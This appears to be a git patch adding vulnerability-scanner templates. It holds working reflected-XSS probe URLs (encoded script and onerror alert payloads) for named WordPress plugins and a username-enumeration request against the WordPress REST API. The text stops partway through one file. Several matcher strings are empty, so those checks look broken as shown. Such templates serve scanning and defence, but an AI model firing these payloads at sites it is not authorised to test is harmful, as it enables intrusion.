From 6418cf9ac43a7d4121d979ae9afb12f54511729e Mon Sep 17 00:00:00 2001
From: AndroidHappier <51598016+CharanRayudu@users.noreply.github.com>
Date: Thu, 15 Jul 2021 23:37:15 +0530
Subject: [PATCH] Add files via upload
---
CVE-2011-4618.yaml | 29 +++++++++++++++
CVE-2011-4624.yaml | 29 +++++++++++++++
CVE-2011-4926.yaml | 29 +++++++++++++++
CVE-2011-5107.yaml | 29 +++++++++++++++
CVE-2011-5179.yaml | 29 +++++++++++++++
CVE-2011-5181.yaml | 29 +++++++++++++++
CVE-2011-5265.yaml | 29 +++++++++++++++
CVE-2012-0901.yaml | 29 +++++++++++++++
CVE-2012-2371.yaml | 29 +++++++++++++++
CVE-2012-4242.yaml | 29 +++++++++++++++
CVE-2012-5913.yaml | 29 +++++++++++++++
CVE-2013-2287.yaml | 29 +++++++++++++++
CVE-2013-3526.yaml | 29 +++++++++++++++
CVE-2014-9094.yaml | 29 +++++++++++++++
CVE-2017-5487.yaml | 35 ++++++++++++++++++
CVE-2019-14470.yaml | 31 ++++++++++++++++
CVE-2019-15889.yaml | 29 +++++++++++++++
CVE-2020-29395.yaml | 31 ++++++++++++++++
README.md | 5 ++-
error-logs.yaml | 57 ++++++++++++++++++++++++++++++
exposed-bitkeeper.yaml | 27 ++++++++++++++
exposed-bzr.yaml | 30 ++++++++++++++++
exposed-darcs.yaml | 23 ++++++++++++
exposed-hg.yaml | 24 +++++++++++++
wordpress-accessible-wpconfig.yaml | 39 ++++++++++++++++++++
wp-ambience-xss.yaml | 29 +++++++++++++++
wp-church-admin-xss.yaml | 29 +++++++++++++++
wp-finder-xss.yaml | 29 +++++++++++++++
wp-knews-xss.yaml | 29 +++++++++++++++
wp-phpfreechat-xss.yaml | 29 +++++++++++++++
wp-securimage-xss.yaml | 29 +++++++++++++++
wp-socialfit-xss.yaml | 29 +++++++++++++++
32 files changed, 937 insertions(+), 3 deletions(-)
create mode 100644 CVE-2011-4618.yaml
create mode 100644 CVE-2011-4624.yaml
create mode 100644 CVE-2011-4926.yaml
create mode 100644 CVE-2011-5107.yaml
create mode 100644 CVE-2011-5179.yaml
create mode 100644 CVE-2011-5181.yaml
create mode 100644 CVE-2011-5265.yaml
create mode 100644 CVE-2012-0901.yaml
create mode 100644 CVE-2012-2371.yaml
create mode 100644 CVE-2012-4242.yaml
create mode 100644 CVE-2012-5913.yaml
create mode 100644 CVE-2013-2287.yaml
create mode 100644 CVE-2013-3526.yaml
create mode 100644 CVE-2014-9094.yaml
create mode 100644 CVE-2017-5487.yaml
create mode 100644 CVE-2019-14470.yaml
create mode 100644 CVE-2019-15889.yaml
create mode 100644 CVE-2020-29395.yaml
create mode 100644 error-logs.yaml
create mode 100644 exposed-bitkeeper.yaml
create mode 100644 exposed-bzr.yaml
create mode 100644 exposed-darcs.yaml
create mode 100644 exposed-hg.yaml
create mode 100644 wordpress-accessible-wpconfig.yaml
create mode 100644 wp-ambience-xss.yaml
create mode 100644 wp-church-admin-xss.yaml
create mode 100644 wp-finder-xss.yaml
create mode 100644 wp-knews-xss.yaml
create mode 100644 wp-phpfreechat-xss.yaml
create mode 100644 wp-securimage-xss.yaml
create mode 100644 wp-socialfit-xss.yaml
diff --git a/CVE-2011-4618.yaml b/CVE-2011-4618.yaml
new file mode 100644
index 0000000..6593682
--- /dev/null
+++ b/CVE-2011-4618.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-4618
+
+info:
+ name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-4624.yaml b/CVE-2011-4624.yaml
new file mode 100644
index 0000000..5ad804b
--- /dev/null
+++ b/CVE-2011-4624.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-4624
+
+info:
+ name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-4926.yaml b/CVE-2011-4926.yaml
new file mode 100644
index 0000000..bc278b7
--- /dev/null
+++ b/CVE-2011-4926.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-4926
+
+info:
+ name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-5107.yaml b/CVE-2011-5107.yaml
new file mode 100644
index 0000000..d62a889
--- /dev/null
+++ b/CVE-2011-5107.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5107
+
+info:
+ name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-5179.yaml b/CVE-2011-5179.yaml
new file mode 100644
index 0000000..ba0bd6e
--- /dev/null
+++ b/CVE-2011-5179.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5179
+
+info:
+ name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-5181.yaml b/CVE-2011-5181.yaml
new file mode 100644
index 0000000..1ee7cb8
--- /dev/null
+++ b/CVE-2011-5181.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5181
+
+info:
+ name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-5265.yaml b/CVE-2011-5265.yaml
new file mode 100644
index 0000000..109499f
--- /dev/null
+++ b/CVE-2011-5265.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5265
+
+info:
+ name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2012-0901.yaml b/CVE-2012-0901.yaml
new file mode 100644
index 0000000..6f20b82
--- /dev/null
+++ b/CVE-2012-0901.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-0901
+
+info:
+ name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2012-2371.yaml b/CVE-2012-2371.yaml
new file mode 100644
index 0000000..e9bf01a
--- /dev/null
+++ b/CVE-2012-2371.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-2371
+
+info:
+ name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "
"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2012-4242.yaml b/CVE-2012-4242.yaml
new file mode 100644
index 0000000..791034e
--- /dev/null
+++ b/CVE-2012-4242.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-4242
+
+info:
+ name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2012-5913.yaml b/CVE-2012-5913.yaml
new file mode 100644
index 0000000..23512f1
--- /dev/null
+++ b/CVE-2012-5913.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-5913
+
+info:
+ name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2013-2287.yaml b/CVE-2013-2287.yaml
new file mode 100644
index 0000000..33a0b55
--- /dev/null
+++ b/CVE-2013-2287.yaml
@@ -0,0 +1,29 @@
+id: CVE-2013-2287
+
+info:
+ name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2013-3526.yaml b/CVE-2013-3526.yaml
new file mode 100644
index 0000000..b081219
--- /dev/null
+++ b/CVE-2013-3526.yaml
@@ -0,0 +1,29 @@
+id: CVE-2013-3526
+
+info:
+ name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2014-9094.yaml b/CVE-2014-9094.yaml
new file mode 100644
index 0000000..81ae8ce
--- /dev/null
+++ b/CVE-2014-9094.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+ name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+ tags: cve,2014,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-5487.yaml b/CVE-2017-5487.yaml
new file mode 100644
index 0000000..8668479
--- /dev/null
+++ b/CVE-2017-5487.yaml
@@ -0,0 +1,35 @@
+id: CVE-2017-5487
+
+info:
+ name: WordPress Core < 4.7.1 - Username Enumeration
+ author: Manas_Harsh,daffainfo,geeknik
+ severity: info
+ description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
+ tags: cve,cve2017,wordpress
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+ - https://www.exploit-db.com/exploits/41497
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/wp/v2/users/"
+ - "{{BaseURL}}/?rest_route=/wp/v2/users/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"id":'
+ - '"name":'
+ - '"avatar_urls":'
+ condition: and
diff --git a/CVE-2019-14470.yaml b/CVE-2019-14470.yaml
new file mode 100644
index 0000000..291551f
--- /dev/null
+++ b/CVE-2019-14470.yaml
@@ -0,0 +1,31 @@
+id: CVE-2019-14470
+
+info:
+ name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/9815
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "